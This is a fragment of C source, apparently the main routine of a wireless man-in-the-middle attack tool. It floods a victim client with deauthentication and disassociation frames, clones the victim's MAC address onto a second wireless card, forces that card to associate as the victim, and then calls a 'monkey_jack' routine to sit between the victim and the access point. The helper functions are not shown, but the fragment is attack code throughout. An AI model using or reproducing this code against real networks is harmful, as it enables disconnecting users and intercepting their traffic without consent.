    setbuf(stdout, NULL);
    printf("forcing ourselves in the middle...");


    for(i=0;i < deauth_count;i++) {
        send_deauth(bssid, victim);
    }

    for(i=0;i < disassoc_count;i++) {
        send_disassoc(bssid, victim);
    }

    if(ioctl(client_sockfd, SIOCAJSMODE, &req) < 0) {
        perror("ioctl: SIOCAJSMODE");
        exit(1);
    }

    associate();

    printf("done.\n");

    printf("configuring lucent card...");
    change_mac(server_ifname, victim);
    set_ifup(server_ifname);

    if((server_sockfd = get_socket(server_ifname)) < 0) {
        perror("get_socket");
        exit(1);
    }

    printf("done.\n");

    printf("coercing our card to associate as the victim...");
    force_assoc();
    printf("done.\n");

    printf("\nlayer 1 insertion complete.\n\n");

    monkey_jack();

    close(client_sockfd);
    close(server_sockfd);
    exit(0);
}

